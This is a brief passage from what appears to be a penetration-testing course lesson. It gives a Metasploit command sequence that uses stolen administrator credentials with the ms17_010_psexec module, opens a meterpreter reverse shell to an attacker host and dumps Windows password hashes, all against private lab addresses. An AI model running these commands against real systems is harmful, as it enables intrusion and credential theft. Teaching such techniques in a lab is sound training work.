M14L5: continue

Below we have a video of what we can do after getting the credentials, how it will be handled in metasploit. msfconsole -q use exploit/windows/smb/ms17_010_psexec set RHOST 192.168.210.3 set payload windows/x64/meterpreter/reverse_tcp set SMBUser administrator set SMBPass 12345678 set LHOST 192.168.210.4 exploit run post/windows/gather/hashdump After obtaining the users and passwords, you can get a new session […]